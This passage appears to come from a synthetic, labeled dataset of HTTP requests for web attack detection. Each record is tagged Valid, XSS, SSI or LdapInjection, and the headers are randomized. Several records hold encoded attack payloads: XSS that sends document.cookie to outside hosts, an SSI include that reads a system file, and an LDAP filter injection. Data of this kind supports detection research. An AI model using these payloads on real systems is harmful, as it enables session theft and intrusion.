If-Range: Fri, 19 Mar 04 24:09:44 UTC
Max-Forwards: 464
MIME-Version: 3.9
Pragma: R=uf
Proxy-Authorization: 3yun qdnloeo=9idsis
Authorization: Basic aG9idUFiOmxvYTZ5
Range: -8848
Referer: /sosHkAnv/bt9ltS9i/Sbscntu.nsf
TE: gzip;q=0.7,trailers
Trailer: Range
User-Agent: Mozilla/1.7 (Machintosh; U; PPC Mac OS X 4.5; rm-ee; rv:5.7.0) Gecko/88397160
UA-Disp: 074,566,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 126x7026
Via: HTTP/1.2 178.177.238.119
Transfer-Encoding: identity
Upgrade: rnT/4.1, eii4T/3.5, i8M0at/5.5
Warning: 378 www.aTda.shtml:90489 "edshyitsh0maewoeo" "Thu, 15 Jun 06 01:26:06 UTC"
X-Forwarded-For: 200.112.50.72
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48477
Start - Id: 47522
class: XSS
GET /c6HE91by/nengeoisrwthO/t9QRbPlV@lTy_cQ_rhX/yXVBJWf.html?npOl=or%24a+xwget+i&aeahreog=%26%3Cscript++%3E%5Bwindow.open%28%27http%3A%2F%2F11.213.102.194%2Fistich.php4%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E HTTP/1.0
Host: www.m5UgeF0Te.be
Connection: oioit
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ue2i-4che8nm2;q=0.1, 1-taoeku;q=0.3
Cache-Control: no-cache
Client-ip: 2.40.61.206
Cookie: N8At=ifa
Cookie2: $Version="7"
Date: Mon, 01 Jan 07 03:16:38 GMT
ETag: "EaAlK23iso.d7ql"
Expect: mAnknsm
From: eudn2a@se5tse.com
If-Modified-Since: Thu, 23 Feb 06 15:12:57 GMT
If-Unmodified-Since: Wed, 27 May 09 24:01:32 GMT
If-Match: "GtXlpG9O2ov-7RCxd"
If-None-Match: *
If-Range: "-GM2B--IWD6_ZHIvnQ"
Max-Forwards: 822
MIME-Version: 0.2
Pragma: aeoratsn='udW'
Proxy-Authorization: Basic RWhzaWU6b05ub2U=
Authorization: NTLM dktmdHRSaXl1OGNtaWF0bGV0Z0Fzc3hvcm9SdXc5T3Q=
Range: 22-,852303-,3-
Referer: /2a3eiT/si4rnbm/aeYmel/ettb/Cjni.txt
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: yZ@Scm http://www.obasmdrr.org
UA-CPU: PowerPC
UA-Disp: 0811,223,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: FTP/2.1 www.ee22ul.tiff:38547
Transfer-Encoding: gzip
Upgrade: atsa/8.3
Warning: 781 255.112.125.38 "ehmjCimcbjUud9qrtdru" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47522
Start - Id: 18470
class: Valid
GET /xu4yBb8HbbstZi.asp?pm=7842679&iyleaTig=hnnysLobn7si&s-dn8m7N1cOl=9248&ot=431020&ns=7&aqhku=77247906&frst5=ehebgsound&h4r7Ienewaffah=MaSbccerautoexec&ooonC1k=36&neeba=ct&euorts=31&3Jn1=yoeeAiechildAe&e3i9ro=emg%5Dn4tieto&4odws=form%3A5%281t8oasije2pvtt+o HTTP/1.1
Host: www.ieaBhhept.org
Connection: close
Accept: text/xml, video/mpeg
Accept-Charset: iso-8859-9
Accept-Encoding: 
Accept-Language: tgghe-ar5Froo
Cache-Control: only-if-cached
Client-ip: 217.249.31.231
Cookie: R3Rkclsihieist=3LOQ;tbzatee=57;rmaiossdkcTuO=57;1nacnr0eh=55507248;iiusrh5wz=ttgterwetiusn
Cookie2: $Version="20"
Date: Mon, 18 Jun 07 10:13:43 UTC
ETag: W/"6OTBx1cK1gj_WCSz9Stv"
Expect: jzie
From: ee1e@sacey.de
If-Modified-Since: Fri, 07 Mar 08 01:07:45 UTC
If-Unmodified-Since: Mon, 23 Mar 09 18:41:50 GMT
If-Match: "2lxyrT9pD.Ju8mH8B"
If-None-Match: *
If-Range: "C2JVHl8ZVPfAP15"
Max-Forwards: 7172
MIME-Version: 1.9
Pragma: lsioP=0met
Proxy-Authorization: mdtspE NmaFtM=lagctp
Authorization: Digest cnonce="9Nlhaaeo"
Range: 72-79
Referer: /tYaus.asp
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/2.6 (compatible; Konqueror/4.8; Unix; an0rthncra; 5uzlr0sfy; srzlenam)
UA-CPU: PowerPC
UA-Disp: 1147,7434,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 934x751
Via: FTP/3.1 124.142.173.125, nvft/8.2 211.158.14.23, tl0/7.9 152.205.126.29
Transfer-Encoding: gzip
Upgrade: nddn/2.1, t05a/5.1, sKs/3.2, 0Ien/4.5, hta/3.8
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 110.33.123.65
X-Serial-Number: 63866719
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 18470
Start - Id: 36902
class: LdapInjection
POST /Astp0e.jpg? HTTP/1.0
Content-Length: 114
Content-Language: laoteipg
Content-Encoding: compress
Content-Location: /ntwo/eonlritr/ae3ini/haoeh5x.asp
Content-MD5: dW9lbmVpUjBkbWR0ZnRsYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Dec 04 08:40:39 GMT
Host: www.zpoxdydore.com
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, deflate, compress, identity;q=0.7, compress
Accept-Language: *
Cache-Control: tF='wh'
Client-ip: 34.8.223.196
Cookie: drsiaocnhn=connect;nEtalNe=tBopte>a;W@5phpupr=1;l9stdinPbaG0=2iEhc4
Date: Sun, 26 Nov 06 14:35:43 UTC
Pragma: asM=tooe
Proxy-Authorization: Basic dTJlaTplcjNyY0hv
Authorization: NTLM YWJsdHhiaG1laXFpZG1sZG9ueW9zcWVjaDFiYXRjSHR0RGU=
Referer: /0tasehee.php4
Trailer: User-Agent
User-Agent: Mozilla/7.0 (Machintosh; U; Mac OS X 3.3; pa-ba; rv:0.1.9) Gecko/87779296
UA-OS: Win98
Transfer-Encoding: identity
Warning: 128 59.175.65.205 "atelalsoarn" 

Tem22=")(targetfilter=(o=NetscapeRoot))&Acenbua0=nar:nlemailrlliframevRxtng&lZGCoM=265&Ren=48283

End - Id: 36902
Start - Id: 40672
class: SSI
GET /m8w/utWKSyo/iwx_z.html?etSkioewipH=ys4gmPwAQ-&fohntrnbi=oimpgac&nv=i&re=9732&on4=etcatetsAnRoja&o@Xt=%3C%21--%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E HTTP/1.1
Host: 217.77.26.28:362
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: 0yaaaole-pansnt;q=0.2, cou-s;q=0.3, c35-tarlaR;q=0.9
Cache-Control: no-store
Client-ip: 146.221.195.70
Cookie: jn0Tt=2475;iinmoCsel=eGdbocweo@a xp_eputa ;nt2h9ObhbIwaoi=49708;tpetsttonesjM=52589948;tdcsa1aumj1tmil=5758070
Cookie2: $Version="864"
Date: Fri, 18 Mar 05 16:44:04 CET
ETag: "@mxl29ew6yTgJ5nW"
Expect: 100-continue
From: taaslTl@7ntsatsanh.cz
If-Modified-Since: Fri, 20 Mar 09 08:23:22 UTC
If-Unmodified-Since: Mon, 14 Apr 08 15:48:29 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 05 May 05 20:20:48 CET
Max-Forwards: 8
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest nc=a9ACEB75
Authorization: Digest nc=cd36dfAd
Range: 266226-,-04
Referer: /olceutt.pl
TE: chunked,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/3.0 (X11; U; SunOS sun4u 1.2; hq-ol; rv:4.0.7) Gecko/48195389
UA-CPU: MIPS
UA-Disp: 155,8180,16
UA-OS: Windows 98
UA-Color: color8
Via: 1.5 254.69.99.82, FTP/2.6 www.xTeEsm.jpg, 6.8 www.oezt.js
Transfer-Encoding: compress
Upgrade: m3ott/2.6
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40672
Start - Id: 47953
class: XSS
GET /Tsr4Ojehl/st@sU9QSOWO6B_Bv5/fA.gif?.1tl-LM0UQXv=i2t%3Bana5n6tU%2F&mthp8ch=thi&wnh9e=3242&eF=3749&tciaksaee=sHn&ib7ftOreAh=%3Cimg+++++src++++%3D+%22++lliner+%22onmouseover++++%3D+++%22+++++%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.el.com%2Fcgi-bin%2Fol.cgi%27%2Bdocument.cookie%29%3B%5D++%22+++%3E&eamx2RmFr6dat=uoFla&MShQbodyW-=bsll+HobjectfTperllimgcd+ee&imglLq=7+&hgan=199&MMZ3K0GrK=vTocxrdoH&UKZ5ndPMqrq%u=hocopyc&obsseoaRYldOa=240 HTTP/1.0
Host: www.tfCo6.it
Connection: close
Accept: audio/x-wav;q=0.7, audio/*, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 120.235.185.123
Cookie: ln=ent;en=a dNaaihuybfD;1scriptQjC8eB=:b
Cookie2: $Version="803"
Date: Sun, 15 Mar 09 11:58:04 CET
ETag: "WEVlnkxAx84k3BG8N5"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Fri, 13 Aug 04 17:24:36 CET
If-Unmodified-Since: Wed, 20 Jun 07 09:51:48 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 239
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: noVEdn roedY=desdiE
Authorization: Basic YWZ1bzppSGVBdEU=
Range: -162,92-
Referer: http://www.lele.st/emrSrtrl/rhxb.dll
TE: chunked;q=0.6,deflate;q=0.3,deflate
Trailer: Date
User-Agent: auEunadith
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3364x532
Via: wAow/6.2 9.43.58.114, 8.7 28.60.198.109
Transfer-Encoding: deflate
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 644 www.h7jist.js:4 "esfqduza4efrwceom" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 91293701405226650926
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47953
Start - Id: 13209
class: Valid
GET /iJnjchildbodyGIHF77T/FRIFEJiframe_zhaving6b/sysyVWD7tqxc.v/WRpoptsystempinputdLphpb@A/kergsdxng0t/gE9hscriptpsam2apMSb/f0nPcIm/ttlae2/c7servicesaM7-.OADu2.png? HTTP/1.1
Host: 30.134.215.171:479
Connection: ehblcee
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: ncii47e-8i2alist;q=0.3, mua-eesw3sy;q=0.2, tnIbuo-uao;q=0.7, ope6-u9tev, yi-gmedtgo;q=0.9
Cache-Control: i='nABd'
Client-ip: 123.96.35.183
Cookie: npnluD=858408;FbQ91Y7x=te6or;egel4=opt?~;eucesiR=t1hfsmo:ri4-4rt;faeot=hq39lZ
Cookie2: $Version="29"
Date: Wed, 17 Sep 08 02:53:28 UTC
ETag: W/"gyYo@XoOMvpTCz_Mfh"
Expect: meijIop=igao
From: msa1sei@snhodn.biz
If-Modified-Since: Wed, 25 Nov 09 21:29:04 GMT
If-Unmodified-Since: Tue, 20 Oct 09 04:46:31 UTC
If-Match: "e53tTvP3pUM.qKVx0@"
If-None-Match: *
If-Range: *
Max-Forwards: 489
MIME-Version: 7.1
Pragma: 6tLr='ttuiu1Ta'
Proxy-Authorization: Basic bGxUbjZvdU86c2FvbGxOZnI=
Authorization: Digest algorithm=otaa
Range: 781398-
Referer: /highajr/groiO/berln.cfm
TE: trailers,trailers,deflate;q=0.6
Trailer: Trailer
User-Agent: aN-HygUCN http://www.tsOldscc.cz
UA-CPU: x86
UA-Disp: 026,187,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6667x346
Via: FTP/6.7 www.senyern0.html
Transfer-Encoding: gzip
Upgrade: tsts/0.5, eao/0.4, t6o/4.1, 2ibk/6.8, ihsqE/6.1
Warning: 751 204.50.136.157 "wlaanseIllOcn4det8i" "Thu, 15 Oct 09 05:51:39 CET"
X-Forwarded-For: 112.1.79.197
X-Serial-Number: 1046866469
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13209
Start - Id: 34726
class: Valid
POST /iaxuFnlty/ztstissbla8dy/eVYm@wSE4e7/wLG09EFB@IH/1qhM6dBt1jKcRw/uquZRsdWh@8Z/uo0j3Z.9ih.shtml? HTTP/1.0
Content-Length: 24
Content-Language: 9H,cohiso
Content-Encoding: gzip
Content-Location: http://6tcozc.it/yooroyr.js
Content-MD5: aGN0dWkybm9zZXVsQ2VwZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Nov 04 24:27:19 GMT
Last-Modified: Wed, 14 Feb 07 02:03:39 GMT
Host: 176.228.45.191:74199
Connection: eiptdo
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, deflate
Accept-Language: *
Cache-Control: min-fresh=8
Client-ip: 63.100.109.215
Cookie: oundtt=r%5Cfdwonsock_streameduP;atp6ez=5s;TCf4BGxb1BI%u=50;da=sr;ktju9pIii0ltd=aNawitXeegeor
Cookie2: $Version="53"
Date: Sat, 08 Jul 06 18:44:12 CET
ETag: W/"tvaIz-1JxMiRT1iZc"
Expect: 100-continue
From: xbsew@porbWqEmi.uk
If-Modified-Since: Sat, 24 Oct 09 05:39:36 CET
If-Unmodified-Since: Sat, 19 Jun 04 12:57:24 UTC
If-Match: *
If-None-Match: "fvrM_rD-k8CcP7b1Z"
If-Range: Sun, 24 Oct 04 15:43:02 CET
Max-Forwards: 516
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bmlHR3BwOm9XbW1NZ28=
Authorization: te1odf tiidr=H26tf
Range: 27601-82680,576792-311040,-975285
Referer: http://ssdoi.ch/teia/bshoekO/oetreaKr/nsME34ie/timrttSo.msf
TE: deflate,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 8.2; ni-hh; rv:3.9.8) Gecko/85192956
UA-CPU: x86
UA-Disp: 497,2476,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 420x8395
Via: 3.2 www.8wuny.jpg
Transfer-Encoding: shyeea; vbtg=jodphNyr
Upgrade: btCas3/7.1
Warning: 037 www.hherAoqh.shtml "Nsboaotl5osqnnpngxrn" "Fri, 28 Aug 09 18:01:13 GMT"
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 17723579277611262634
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

obs=aoWW&aitnacacgne=053

End - Id: 34726
Start - Id: 34870
class: Valid
PUT /n0RI5_@WqhqAbn7pFa9C/beesweoeiCstRe78ne9/ebyn6Fmb/i9nstaoseetDme/tKA0vRT2zBw.jsp? HTTP/1.1
Content-Length: 81
Content-Language: esEzinlr,1sbAt2i
Content-Encoding: identity
Content-Location: /kgnrs9x/OwonwWle/onwbzrn.css
Content-MD5: c09Bc2JuZWpsYWVhcnNoaw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Nov 07 04:27:59 CET
Last-Modified: Wed, 21 Sep 05 23:28:09 GMT
Host: 48.173.36.102:5
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6, ks_c_5601-1987, utf-7, iso-8859-5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 219.97.108.79
Cookie: neexisgn=ydmrassaE0;asdxrsnnd=265
Cookie2: $Version="6"
Date: Thu, 06 Mar 08 05:15:23 CET
ETag: W/"WaHcVBYC9.tRuNIQue"
Expect: 100-continue
From: gdoiesi5@hovn.gov
If-Modified-Since: Wed, 24 Jun 09 12:49:22 CET
If-Unmodified-Since: Thu, 03 Jan 08 03:04:56 UTC
If-Match: *
If-None-Match: ".BqwCMRXT3hX_NLW"
If-Range: Wed, 24 Mar 04 15:45:55 CET
Max-Forwards: 8
MIME-Version: 0.8
Pragma: psnou='Mjnsiy'
Proxy-Authorization: NTLM a1dwZHVwZW91YWRudGFzczN6dHBBZWJodGVvOWh1b2xocw==
Authorization: Digest uri=http://www.zsgwcd2.de/4kabra/lynnr72s/aswN/eoo4aIm/qaomaez.asmx
Range: -00,9-5046
Referer: /4l3isyie.htm
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: ysOiSetpuestaoma
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 084x478
Via: FTP/4.3 235.77.19.174, FTP/8.9 167.164.33.50
Transfer-Encoding: identity
Upgrade: prdbih/2.2, bi6b/4.4, hveXe/8.6, oehe5S/1.6, eo8La/9.0
Warning: 197 www.aRtfe.js "nixbwit" "Wed, 24 Sep 08 09:37:18 CET"
X-Forwarded-For: 201.220.221.193
X-Serial-Number: 26564430456596
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ia6o=586795&OI10updateEN=ituedhpTeFm:-Un&5pO=d>evalr od?r-]lsuP]mytnull

End - Id: 34870
Start - Id: 8770
class: Valid
GET /u6kXkrANYuQ7.R5L/syBZns-v44PfcDa3h@Q/hsqtsksu.gif? HTTP/1.1
Host: www.Ianvdh.fr
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: utf-7;q=0.0
Accept-Encoding: gzip;q=0.9, deflate;q=0.3
Accept-Language: um-4go1i, r0osdid0-lersztd;q=0.6
Cache-Control: max-stale
Client-ip: 210.108.58.90
Cookie: sxbcl=oN_e
Cookie2: $Version="149"
Date: Fri, 16 Nov 07 02:01:54 UTC
ETag: W/"mN-q7y62RCi4Ex1"
Expect: 100-continue
From: xrVtdi5@b55e.cz
If-Modified-Since: Mon, 06 Sep 04 13:47:31 UTC
If-Unmodified-Since: Sat, 15 Jul 06 06:30:56 UTC
If-Match: "GiBpV7ySLsRQiIc_"
If-None-Match: "0@TeIXl9ahpVPTt"
If-Range: "G633CQ2YQtHI1Huvfs"
Max-Forwards: 5
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic OWVxbjplZUJBaA==
Authorization: Digest uri=/tw6uw/sair/zlUepon2.wmn
Range: -914608,-7
Referer: /des5e/xn8tmiu9.doc
TE: trailers,gzip;q=0.3,trailers
Trailer: Max-Forwards
User-Agent: iiiwhtMoo (i_tq.VI)
UA-CPU: Sparc
UA-Disp: 608,0739,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3952x6692
Via: 4.9 51.90.131.233, 5.0 94.190.125.173:5697
Transfer-Encoding: deflate
Upgrade: imnd/5.9
Warning: 402 23.131.10.198 "62pynasz" "Thu, 23 Oct 08 04:18:42 UTC"
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8770
Start - Id: 25912
class: Valid
GET /dm9POk/act/eml/d-Ed355zKwmfpXr7/1hisg0dnoTyeite/m_r2cB/otatylu/mdwpkteroR/nTd/ou2i@rgkCuSbDI.jsp?deEIfbt=hE%25nlaudropsi&5zZfm=7%5Cf HTTP/1.0
Host: www.l2kjm4pga.it
Connection: close
Accept: image/*, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Aeeoo-Oah, 4s5atRp-c;q=0.9, eiarlc-t, c-n
Cache-Control: uast=lidfbs
Client-ip: 86.110.54.19
Cookie: a9ppSresbyxEn=ueb8;tWoFe4mehea=0134
Cookie2: $Version="1"
Date: Tue, 22 Jun 04 12:40:52 UTC
ETag: W/"q3Fpekrqkx1lVku"
Expect: 100-continue
From: gosesow@ihn6lcen.de
If-Modified-Since: Mon, 31 Jul 06 22:39:59 UTC
If-Unmodified-Since: Wed, 26 Mar 08 09:34:21 CET
If-Match: *
If-None-Match: "D7sIYeJGZbHpzlgXCBaN"
If-Range: *
Max-Forwards: 0812
MIME-Version: 7.9
Pragma: Rved6='ra3'
Proxy-Authorization: Basic aHJmZWlhYTpoaWV5
Authorization: NTLM c05jTmlUaGlyZXkxZUlybHN5MWFvNFdFd2VuaDJvQWd4Z3B1OGhza202c3U=
Range: -1130,110984-785,-31
Referer: /warnAiIt/ietu85na/tl8uea/lfles.jpg
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 1.8; hj-nn; rv:9.5.5) Gecko/19480968
UA-CPU: x86
UA-Disp: 859,629,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 069x973
Via: 3.7 251.20.215.67, 7.7 www.ctnx5s.htm, HTTP/1.8 152.164.231.172
Transfer-Encoding: dtShn
Upgrade: rRETsr/8.0, eda7ou/6.7
Warning: 862 254.139.199.159 "hnptOgFo1IjtwesaTav" 
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1807971586692
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25912
Start - Id: 16473
class: Valid
GET /rrbs/l9ooo8rAvtJTWloGjfZd/3mtnvsn/Tj6i.tiff?NsiokAtae2l1=868933&eeo=+3inw HTTP/1.0
Host: www.getv.st:80
Connection: close
Accept: image/jpeg;q=0.8
Accept-Charset: windows-1257, x-mac-icelandic;q=0.7, x-mac-turkish, euc-jp
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 193.249.37.36
Cookie: Mem8se=em3eewmgformpa%ui :woptih;ti=jn;ocideeadTksaeus=tetc)ah;aetaaxnef= %sau\/is;ilvvancsi5=nytr;sp7emoguxeeu8=DszaUbesitip3
Cookie2: $Version="75"
Date: Fri, 12 Dec 08 23:08:03 UTC
ETag: W/"7ZIa@ypOpsN0Ej0_f"
Expect: a8ore9x=5uyanh;logp
From: enneeci@ehirrnmall.it
If-Modified-Since: Sat, 30 Dec 06 18:58:31 GMT
If-Unmodified-Since: Fri, 04 May 07 15:43:30 UTC
If-Match: *
If-None-Match: "p6VO3qCR2dAVQNke97"
If-Range: "5oEp8CvexltzMBUhVu"
Max-Forwards: 7
MIME-Version: 1.1
Pragma: arstduet='sU'
Proxy-Authorization: Digest uri=/IAsecrM/t6wjedTo/tthpnsym/rtgxd6hc.jpeg
Authorization: NTLM ZDBldGFoYzlsdHRpZTlkaXRuc2d3cmVvemVockVxdEdn
Range: 367-465064
Referer: http://www.r4idqfr.it/roysysbo/petahmhE/rmmsega/tw6ppje.shtml
TE: trailers,deflate
Trailer: Warning
User-Agent: Mozilla/3.7 (Windows; U; WinNT 8.0; nh-rj; rv:5.0.3) Gecko/29691622
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 714x1442
Via: i9xx1/1.1 157.143.164.62
Transfer-Encoding: identity
Upgrade: ilaso/8.2, rn4tl/5.3, fup/8.7, rg6eut/5.9, n8ht59/1.9
Warning: 543 www.tjetzkwe.png "ctadem" "Wed, 01 Aug 07 06:58:08 GMT"
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 764868889317962495
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 16473
Start - Id: 17227
class: Valid
GET /u63LPx77qS-YZn.js?tlhoedN=cxA_mJKAVE&Tgh=21 HTTP/1.1
Host: www.clnRrb.de
Connection: close
Accept: application/postscript, audio/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aryfo-tHo, 1a-jpror3;q=0.8, 7ihsEyCs-Rme;q=0.4, S-ewWba;q=0.4
Cache-Control: no-store
Client-ip: 233.150.95.107
Cookie: k1E@wLAN=lH2lngmfupF;riEiichieot6i=kn;BDyuvlKperlRI=2761197;Ileyxeattzwsng=jewjs;et=2
Cookie2: $Version="300"
Date: Mon, 26 Apr 10 18:33:03 GMT
ETag: W/"0ya8d47sji5TrKx-"
Expect: 100-continue
From: tytiiae@0oytu.it
If-Modified-Since: Mon, 20 Jun 05 05:34:11 CET
If-Unmodified-Since: Mon, 01 May 06 14:52:48 UTC
If-Match: "cGjvZ8OKzglteZmq1"
If-None-Match: ".8Q2Y7PQ7yLv@l55"
If-Range: "yCa6E8sBx3vMVgz"
Max-Forwards: 7
MIME-Version: 7.1
Pragma: tnnk=e5roero
Proxy-Authorization: NTLM bmx0YTA2dGVkcDkwdHNzdG51ZHNoZTNuZG5obWJhYXJvcmRtZg==
Authorization: Digest qop=auth
Range: 5758-14458,-0
Referer: http://www.n7jtcga.com/ttQvn/na8dme.png
TE: chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: hlstltoZtzs3Ld
UA-CPU: StrongARM
UA-Disp: 121,6829,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4168x797
Via: 2.6 119.150.25.159
Transfer-Encoding: iWwiea; mc0l=sh1lev
Upgrade: ezft/4.3, hgob/9.9, uqy1/8.3, lh5t/1.6, Das8c/2.5
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 220039
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17227
Start - Id: 6767
class: Valid
POST /sd/hirgaa2rgo7mimH2N/FC8xmlEehttps/d0dgiGk1oRJ_cIlPw/7edia5noluRRCl.gif? HTTP/1.1
Content-Length: 149
Content-Language: rtb,o2o1
Content-Encoding: deflate
Content-Location: http://www.nse6.fr/ibaeeh/ui5h/uH58Exi/Dlanrdqt.asp
Content-MD5: YmhJcGhjdGRuZHR0Z21lbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 04 Mar 04 03:05:35 GMT
Last-Modified: Thu, 30 Nov 06 15:26:13 UTC
Host: www.0rr1na.de
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: rwnAai-sNrsprSa, nieJwATp-e1a, rjmo3h-ntft8ml
Cache-Control: m1aer='fnxe'
Client-ip: 166.208.84.151
Cookie: wstgar=etcw;iusct=access_logi1https;Teh=88638
Cookie2: $Version="75"
Date: Thu, 27 Dec 07 02:20:23 UTC
ETag: W/"nIer1aazeXnvQzYg"
Expect: 100-continue
From: hgrgi@twaau.be
If-Modified-Since: Fri, 25 Aug 06 05:31:44 CET
If-Unmodified-Since: Sun, 08 Mar 09 18:52:11 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Dec 07 06:46:44 GMT
Max-Forwards: 926
MIME-Version: 4.3
Pragma: eolhC=8
Proxy-Authorization: Digest username="dZssynoF"
Authorization: Basic ZG90Y2k6ZTJ0aA==
Range: 56346-5
Referer: /he2hec.mp3
TE: chunked,trailers
Trailer: Accept
User-Agent: oseRerhmai/4.8
UA-CPU: StrongARM
UA-Disp: 610,0382,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3268x616
Via: 6.0 www.hi9iegh.html:194, HTTP/0.6 www.ecwrahpe.css:65427, HTTP/1.6 207.16.231.136
Transfer-Encoding: gzip
Upgrade: gM0p/0.4, gwlnkh/0.0
Warning: 686 27.211.29.45 "sijrpot" "Sat, 10 Jun 06 10:21:01 UTC"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 830725
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mitpithkda4lh=dDpdJc4&rwthyp=arlee&r4dmeemr=lbgsoundteo&1aeFfts=e&oet5tuNlasde=l5uj/estyle9ta9s|l&Ewtmnnf=>tsdq&0cw=4121&0tntzc=nUys&dit7s3a=la

End - Id: 6767
Start - Id: 48027
class: XSS
GET /iqMO-7C__cfPfeH6L/tJguOJx220EyFntW7g/uf/16ci5ZVvts69wmAXxP/nasRebgandEoie/irewi7hdG/tpndEetaa3seai/acyChM/lvpshOngftfidlcbzyfh/eDyWXoO/NlycrcpHCRtyA.png?a1niv=11&iecejrbl=mWHoOt1&uNaIYhynzch=sets3&aadsta1nn=%3Cdiv+style++++%3D++++%22++++binding%3A++++url%28%5Bhttp%3A%2F%2Fwww.vetr.com%2Fscript%2Fv5.nsf%5D%29%3B%22++%3E&i82oT0TMfmo76c=hi8%3Dtmpsatpiii%40lweuservicesr+&eo=e511zatplicilqrr&oks=1is&2imgwiframehcnwhere=edwcO&qQkftzlZ0=xlrt&Iz1htae=mTo+execanO%2BrcS%2B%3C%29ensE HTTP/1.0
Host: 185.190.210.151:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: Yz-woccz
Cache-Control: min-fresh=6174
Client-ip: 187.82.70.221
Cookie: 42hs79=iesgroup byanurlhome;nTmehwIjoe3qi=svN7Gd;rp=22385;gles=neq)servicess5accept=bts l6r;eocro=@ia-atelnetuewp-qgenHe;uo=s8j
Cookie2: $Version="114"
Date: Sun, 21 Dec 08 03:10:12 GMT
ETag: W/"Z03a@HNkPazFYlhD_E."
Expect: npRl7Nrr
From: uesois@ewrsoxtt.it
